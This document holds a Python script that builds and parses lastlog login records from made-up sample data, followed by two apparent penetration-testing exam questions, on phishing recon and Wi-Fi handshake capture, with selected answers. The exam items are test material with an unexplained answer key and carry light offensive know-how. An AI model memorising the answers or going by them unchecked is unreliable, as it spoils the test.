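```python
import struct
from datetime import datetime, timezone

# Assumed layout: glibc on x86-64, struct lastlog = int32 ll_time,
# char ll_line[32], char ll_host[256] -> 292 bytes; record N belongs to UID N.
LASTLOG_RECORD = struct.Struct("<i32s256s")

# Constructed sample: {uid: (epoch, tty, remote_host)}, not real log data.
SAMPLE_ENTRIES = {
    0: (1700000000, "tty1", ""),
    1000: (1700003600, "pts/0", "10.0.0.5"),
    1001: (1700001000, "pts/1", "10.0.0.9"),
}


def build_lastlog(entries):
    """Build a lastlog image from {uid: (epoch, line, host)}.

    UIDs with no login are all-zero records; the real file is sparse, which is
    why ls -l shows it as huge while du shows it as tiny.
    """
    image = bytearray(LASTLOG_RECORD.size * (max(entries) + 1))
    for uid, (epoch, line, host) in entries.items():
        LASTLOG_RECORD.pack_into(image, uid * LASTLOG_RECORD.size,
                                 epoch, line.encode(), host.encode())
    return bytes(image)


def _cstr(raw):
    """Decode a NUL-padded fixed-width C string."""
    return raw.split(b"\0", 1)[0].decode("utf-8", errors="replace")


def parse_lastlog(data):
    """Return one dict per UID that has ever logged in, in UID order."""
    records = []
    for uid in range(len(data) // LASTLOG_RECORD.size):
        epoch, line, host = LASTLOG_RECORD.unpack_from(data, uid * LASTLOG_RECORD.size)
        if epoch == 0:
            continue          # shown as "**Never logged in**" by lastlog(8)
        records.append({
            "uid": uid,
            "epoch": epoch,
            "when": datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat(),
            "line": _cstr(line),
            "host": _cstr(host),
        })
    return records


def most_recent_login(data):
    """The single most recent login across all users, or None if nobody has logged in."""
    records = parse_lastlog(data)
    return max(records, key=lambda r: r["epoch"]) if records else None


if __name__ == "__main__":
    image = build_lastlog(SAMPLE_ENTRIES)
    for rec in parse_lastlog(image):
        print(rec)
    print("most recent:", most_recent_login(image))
```

Map the UID back to a name through /etc/passwd (or getpwuid) rather than trusting the record itself. Remember that lastlog keeps only the latest login per user; the full login history lives in /var/log/wtmp (read with the last command), and an attacker with write access can zero a record just as the tester in question 230 is asked about.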
Question #: 239
Topic #: 1
A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?
A. WHOIS domain lookup
B. Job listing and recruitment ads
C. SSL certificate information
D. Public data breach dumps
Selected Answer: A
Question #: 240
Topic #: 1
Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?
A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng
Selected Answer: D